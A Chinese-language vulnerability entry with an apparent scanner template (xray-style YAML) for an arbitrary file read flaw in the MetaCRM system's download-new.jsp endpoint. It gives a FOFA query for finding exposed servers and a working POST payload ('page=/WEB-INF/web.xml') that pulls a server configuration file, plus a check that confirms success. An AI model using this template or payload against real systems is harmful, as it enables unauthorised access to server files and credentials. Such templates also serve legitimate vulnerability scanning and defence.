漏洞描述
MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
fofa:body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
id: metacrm-download-new-fileread
info:
name: MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
author: avic123
severity: high
verified: true
description: |
MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
fofa:body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
reference:
- https://mp.weixin.qq.com/s/3xxbwyqkcv5I52iJc7TJjQ
tags: metaCRM,fileread
created: 2025/09/09
rules:
r0:
request:
method: POST
path: /business/common/download-new.jsp
body: |
filename=1.png&page=/WEB-INF/web.xml
expression: response.status == 200 && response.body.bcontains(b'<web-app') && response.body.bcontains(b'</web-app>')
expression: r0()